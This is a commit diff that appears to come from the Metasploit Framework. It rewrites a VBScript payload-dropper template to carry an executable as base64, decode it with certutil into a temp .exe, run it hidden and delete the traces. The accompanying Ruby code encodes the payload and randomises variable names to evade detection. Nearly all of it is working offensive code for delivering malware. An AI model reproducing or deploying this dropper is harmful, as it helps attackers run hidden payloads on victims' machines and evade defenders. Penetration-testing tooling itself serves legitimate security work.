Send base64ed shellcode and decode with certutil
f7b053223a9e
parent
53ff3051e1
commit
c8c5549b19
|
|
@ -1,25 +1,26 @@
|
|||
Function %{var_func}()
|
||||
%{var_shellcode} = "%{hex_shellcode}"
|
||||
%{var_shellcode} = "%{base64_shellcode}"
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempexe}
|
||||
Dim %{var_tempbase64}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
||||
For i = 1 to Len(%{var_shellcode}) Step 2
|
||||
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
|
||||
Next
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
|
||||
%{var_stream}.Write %{var_shellcode}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
|
||||
%{var_shell}.run %{var_tempexe}, 0, true
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFile(%{var_tempbase64})
|
||||
%{var_obj}.DeleteFolder(%{var_basedir})
|
||||
End Function
|
||||
|
||||
|
|
|
|||
|
|
@ -1243,6 +1243,7 @@ require 'msf/core/exe/segment_appender'
|
|||
|
||||
hash_sub = {}
|
||||
hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
|
||||
hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
|
||||
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
|
@ -1251,9 +1252,10 @@ require 'msf/core/exe/segment_appender'
|
|||
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
|
||||
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
|
||||
|
||||
hash_sub[:init] = ""
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue